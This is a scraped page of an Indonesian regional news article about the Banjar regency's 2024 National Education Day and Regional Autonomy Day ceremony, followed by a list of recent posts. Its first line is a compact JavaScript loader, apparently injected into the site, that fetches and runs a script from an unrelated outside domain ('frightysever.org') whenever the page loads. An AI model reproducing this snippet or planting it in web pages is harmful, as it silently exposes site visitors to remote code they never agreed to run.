(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Peringatan Hardiknas dan Hari Otda, Wabup Banjar Bacakan Sambutan 2 Menteri


KANALKALIMANTAN.COM, MARTAPURA – Peringatan Hari Pendidikan Nasional (Hardiknas) dan Hari Otonomi Daerah ke-28 tahun 2024 diperingati oleh Pemkab Banjar di halaman Kantor Bupati Banjar, Martapura, Kamis (2/5/2024) pagi.

Wakil Bupati Banjar Habib Idrus Al-Habsyi selaku pembina upacara membacakan sambutan Menteri Pendidikan Kebudayaan Riset dan Teknologi Nadiem Anwar Makarim bahwa lima tahun terakhir ini adalah waktu yang sangat mengesankan dalam perjalanan Kemendikbudristek.

Menurut Nadiem menjadi pemimpin dari gerakan Merdeka Belajar makin menyadarkan tentang tantangan dan kesempatan yang dimiliki untuk memajukan pendidikan Indonesia.

Baca juga: Kuliner Gratis dan Panjat Pinang Warnai Hari Jadi ke-72 Kabupaten HSU

Habib Idrus Al-Habsyi juga membacakan sambutan Menteri Dalam Negeri Muhammad Tito Karnavian pada peringatan Hari Otonomi Daerah ke-28 pada 25 April 2024 dengan tema “Otonomi Daerah Berkelanjutan Menuju Ekonomi Hijau dan Lingkungan yang Sehat”.

Tema ini dipilih untuk memperkokoh komitmen kita dalam membangun keberlanjutan pengelolaan sumber daya alam dan lingkungan hidup serta mempromosikan model ekonomi yang ramah lingkungan demi masa depan berkelanjutan.

Kadisdik Banjar Liana Penny mengatakan, dalam rangkaian kegiatan peringatan Hardiknas selain upacara bendera juga dimeriahkan dengan senam sekolah sehat oleh sejumlah pelajar dan karnaval anak PAUD dengan mengenakan pakaian adat sebanyak 300 anak.

Dia berharap dapat terus melaksanakan program merdeka belajar di sekolah-sekolah sehingga semua sekolah dapat melaksanakannya tahun mendatang lebih baik lagi dengan transformasi pembelajaran.

Baca juga: Peringatan Hari Jadi ke-72 Kabupaten HSU, Paman Birin: Syukuri Capaian Pembangunan

Usai upacara wakil bupati Banjar didampingi Sekda HM Hilman dan Kadisdik Liana Penny menyerahkan bantuan untuk pembelian lahan PGRI tahun 2024 sebesar Rp 12 juta dan diterima oleh Ketua PGRI Kabupaten Banjar.

Wakil Bupati Banjar juga menyerahkan berbagai penghargaan dalam rangka peringatan Hardiknas Tahun 2024 untuk juara 1 diantaranya Pengawas TK dan Penilik PAUD Inovatif Syamsul Qomar Unit Kerja Pengawas TK Korwil Kecamatan Aluhaluh, Kepala Satuan PAUD (TK dan KB) Dedikatif Fahrunnanisa unit kerja KB Anggrek Bulan Kecamatan Simpang Empat, Pendidik/Guru TK dan KB Inovatif Fitria Apriani dari TK Negeri Tunas Pratama Kecamatan Martapura dan Wanita Berprestasi Daerah 3T Lasmina dari SDN Paramasan.

Baca juga: DBD di Banjarbaru Tak Mengenal Musim, 366 Kasus Periode Januari-April

Juga diserahkan piagam penghargaan Nasabah Sekolah Terbaik 1 menabung sampah tahun 2024 kepada Mursidah, piagam penghargaan ini diberikan atas kerjasama Dinas Pendidikan dan PT PLN UID Kalselteng.

Baca juga: Unjuk Rasa Mahasiswa di Rumah Banjar, Komersialiasi Dunia Pendidikan Jadi Sorotan

Turut hadir Forkopimda, para asisten dan Staf Ahli Bupati, Kepala SKPD lingkup Pemkab Banjar, para Direktur Perusahaan Daerah, guru penggerak dan sejumlah pelajar. (Kanalkalimantan.com/dkispbanjar/kk)

Reporter: kk
Editor: Dhani


Muhammad Andi

Recent Posts

25 Anggota PPK Kota Banjarbaru Dilantik, Langsung Bekerja Membentuk Sekretariat

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru resmi melantik 25 orang anggota Panitia… Read More

2 jam ago

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

14 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

15 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

15 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

16 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

17 jam ago

This website uses cookies.